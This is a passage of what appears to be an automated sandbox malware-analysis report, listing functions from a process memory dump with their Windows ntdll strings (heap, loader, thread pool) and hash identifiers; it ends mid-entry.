                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d62dbac7059d79752543add6fbb31e1c1362d78ca15e472db46a1aa11007686
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B3128B1A09B05DFD314EF68DC45E2A77E8EF85760F010598F894AB392DA60DC05CBA2
                                                                                                                                                                                                                                                                Function 33910680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                                                                                                • Opcode ID: 62055fb1a734f6cd5910dcfb19ab91f1d210aac96d9baa216571d28f0e38be3b
                                                                                                                                                                                                                                                                • Instruction ID: 7c98494c8962f3656e8126567c8ef0f8f0d282bfb83a9af316f2e99b57b45312
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62055fb1a734f6cd5910dcfb19ab91f1d210aac96d9baa216571d28f0e38be3b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFF10E74A01709DFEB14CF69C880B6AB7F9FF44384F1481A8E415AB781D73AE991CB90
                                                                                                                                                                                                                                                                Function 33929723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                                                                • Opcode ID: 6da3665990796e924c0cfea3c002c03f6acd6ad4648eb164fd71d5fe6c539a6a
                                                                                                                                                                                                                                                                • Instruction ID: 22845644e3a3c26be5f0c193c3cf6efb1551f7db00acace59a2c99bb4af7f7e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6da3665990796e924c0cfea3c002c03f6acd6ad4648eb164fd71d5fe6c539a6a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E512575A05F09DFE310EF38C880B197BADBF84354F18066CE991DB69ADB709825CB91
                                                                                                                                                                                                                                                                Function 3393C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 339780E9
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 339780F3
                                                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 339780E2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                                                                • Opcode ID: 59456f5ddb3e7ca6ba1509849255f63eb044264e159e1101a81cce3001258864
                                                                                                                                                                                                                                                                • Instruction ID: b369df302cfe02319ad75557996620c6e1b1e02cf5d52315f1a0ba2940594ae5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59456f5ddb3e7ca6ba1509849255f63eb044264e159e1101a81cce3001258864
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC41C1B5A49705EBE710FB64D840B4B77ECEF856A5F00482AB858EB291EB74D8018F91
                                                                                                                                                                                                                                                                Function 339843D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 33984519
                                                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33984508
                                                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 3398450F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                                                                • Opcode ID: a6224ff6588ca3ad3648dfe807572f7bdd3bcfb384d38bf09e9fa95c30fe85d1
                                                                                                                                                                                                                                                                • Instruction ID: 32ec88573b669744655c98eb60c53fb142057f2668d5d5d2e2f75a55b2935a35
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6224ff6588ca3ad3648dfe807572f7bdd3bcfb384d38bf09e9fa95c30fe85d1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E419E76A05711DFDB10DFB8C840A1677E8EFC8790F4A0659EC98AF352E730E8808B91
                                                                                                                                                                                                                                                                Function 3392510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 3392534B
                                                                                                                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 33925167
                                                                                                                                                                                                                                                                • WindowsExcludedProcs, xrefs: 3392514A
                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 3392519B
                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 33925272
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                • API String ID: 0-258546922
                                                                                                                                                                                                                                                                • Opcode ID: 49c223a84c6d71a496bee16aa228554a9e68bfc038ebea371f971dbe9cc01879
                                                                                                                                                                                                                                                                • Instruction ID: ce88008d435a6d5aa8bb09b55891a439f403128639ee7934d4f0b1539f40d21c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49c223a84c6d71a496bee16aa228554a9e68bfc038ebea371f971dbe9cc01879
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F13AB6D0161DEFDB11DF99C980EAEBBBCEF08650F54406AE501E7615EB709E01CBA0
                                                                                                                                                                                                                                                                Function 338F7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                                                                                                • API String ID: 0-3061284088
                                                                                                                                                                                                                                                                • Opcode ID: 7e3566862cc6a1bb223797586bc56d3209ad14cf59abaa0e189b8b8c82b396bb
                                                                                                                                                                                                                                                                • Instruction ID: 50570cf98eaa2ffd0652475b62f82208124a0409d48b1b7feb55f112a13a5aff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3566862cc6a1bb223797586bc56d3209ad14cf59abaa0e189b8b8c82b396bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32014C37506244DEF307E7ACF408F4277D8DB41771F18408AF0504BB91DA969884DA54
                                                                                                                                                                                                                                                                Function 3390A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                                                                                                • Opcode ID: 31c8555898318ce31cd34d4345c9522afa440908099bd88e00921e074d1fd3b6
                                                                                                                                                                                                                                                                • Instruction ID: 010d9c5c0f9e2683675c911e28f87f6c69628b3c172dc7f84866bfe04231d4b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31c8555898318ce31cd34d4345c9522afa440908099bd88e00921e074d1fd3b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C17A78508382CFE321CF68C540B5AB7E8FF85784F04496AF8958B691E778C949CF96
                                                                                                                                                                                                                                                                Function 33938322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • @, xrefs: 339384B1
                                                                                                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3393847E
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33938341
                                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 33938342
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                                                                                                • Opcode ID: c7a2c9cc597f202d00b4e0b8810a412e0252cbde3ae23af22b93ed677fb1e780
                                                                                                                                                                                                                                                                • Instruction ID: e090026ece3a7e3fe88136f5b25978ab502fc7d94ea6c4890ac63b9eec2a673d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7a2c9cc597f202d00b4e0b8810a412e0252cbde3ae23af22b93ed677fb1e780
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7991ADB1909345EFE721CA60C844EABBBECFF85395F44086DFA84D6541E334C948CB62
                                                                                                                                                                                                                                                                Function 3393265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 33971FE8
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 339720C0
                                                                                                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33971FE3, 339720BB
                                                                                                                                                                                                                                                                • .Local, xrefs: 339327F8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                                                                                                • Opcode ID: 7b34b962950f4a936e7d633fc347d610735d2cfd4f42c9db2cc281dff7ad8f01
                                                                                                                                                                                                                                                                • Instruction ID: 84b07dd1a1a9f4bd1515786f4673b520181b713ce4dadf474f3fe58e7c8eb92f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b34b962950f4a936e7d633fc347d610735d2cfd4f42c9db2cc281dff7ad8f01
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22A190B5D02329DBDB20CF64D884B99B3B9FF59364F1441E9D888AB291D7309E85CF90
                                                                                                                                                                                                                                                                Function 339063CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33960E2F
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33960EB5
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33960E72
                                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33960DEC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                                                                                                • Opcode ID: f294045b81b8315806f88567b9038dfd89a2cdf0ea6375d575b474808d499de4
                                                                                                                                                                                                                                                                • Instruction ID: 46aa41db766b72c63f9e14226a1cca7c61c25235850db069ffb7bccc2d4cc417
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f294045b81b8315806f88567b9038dfd89a2cdf0ea6375d575b474808d499de4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5571ADB1908304DFE760DF54C884B8B7BACEF857A4F4405A9F9888A647D735E588CF92
                                                                                                                                                                                                                                                                Function 338FF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                                                                • API String ID: 0-2586055223
                                                                                                                                                                                                                                                                • Opcode ID: 835ee8c68381dc410894aba3842d9b108e9740607be532801303ec4a4c4d824c
                                                                                                                                                                                                                                                                • Instruction ID: ebb1f28731026a71ccc2c4743211d6c23ad11180b5a7ee44b37971b08d89a3ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 835ee8c68381dc410894aba3842d9b108e9740607be532801303ec4a4c4d824c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4612375A04384DFE312CBA4D844F57B7E8EF84B90F080559F9A48B6A2DB35E840CB66
                                                                                                                                                                                                                                                                Function 338F90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                                                                                                                                                • Opcode ID: eef5d407df14267b2706e2df6a5f9531e9b4ea060354dd47e13dcc581a067ab7
                                                                                                                                                                                                                                                                • Instruction ID: 6d20366a6eed87c60f46b10de0648432de035ca813bf411e255720e6c9373072
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eef5d407df14267b2706e2df6a5f9531e9b4ea060354dd47e13dcc581a067ab7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5310936A01208EFEB11DBD8DC84F9EB7B8EF45760F1440A5F524AB391D775D981CA60
                                                                                                                                                                                                                                                                Function 33907072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 06c84314199089deb06c45cf0ddf3d933cf36d63406143b6e06ac370e2d95ed5
                                                                                                                                                                                                                                                                • Instruction ID: 0fbda19a72d96d5970a566c5f4f63a7f4a9e4ec64b03cb0430b738c0cb687ea0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06c84314199089deb06c45cf0ddf3d933cf36d63406143b6e06ac370e2d95ed5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7510E34E00709EFEB05DB64C954BAEB7B8FF443A9F14826AE44297690DB70E911CF80
                                                                                                                                                                                                                                                                Function 33993608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                                                                                                                                                • Opcode ID: 23cf0e884f1bb0fc9f317c699501657e3bf65f3b0ebdc3ce8ad0e8c881e9b5bb
                                                                                                                                                                                                                                                                • Instruction ID: a8a88eea67f32490287363dfa16ffa9d9a1646399e1b6dc25f4447bd313ed6c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23cf0e884f1bb0fc9f317c699501657e3bf65f3b0ebdc3ce8ad0e8c881e9b5bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BF15FB5A00329CBEB21CF19CCC0BD9B3B9AF48794F4481E9D949A7241E7319E85CF55
                                                                                                                                                                                                                                                                Function 33901380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 33901632
                                                                                                                                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33901648
                                                                                                                                                                                                                                                                • HEAP: , xrefs: 339014B6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                • Opcode ID: 62fb6da3b9e253f0f652d60e06e760e18b3cd97db344235d0e9f2d539875275a
                                                                                                                                                                                                                                                                • Instruction ID: 47dd12e9a3317556a9ae6c65b33502c6cc5c98b8b566257b3fa13bbf89a35247
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62fb6da3b9e253f0f652d60e06e760e18b3cd97db344235d0e9f2d539875275a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE1EF78A04345DFEB29CF68C48067ABBE9EF48350F18895DE4D6CB286E734E941CB50
                                                                                                                                                                                                                                                                Function 3390B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
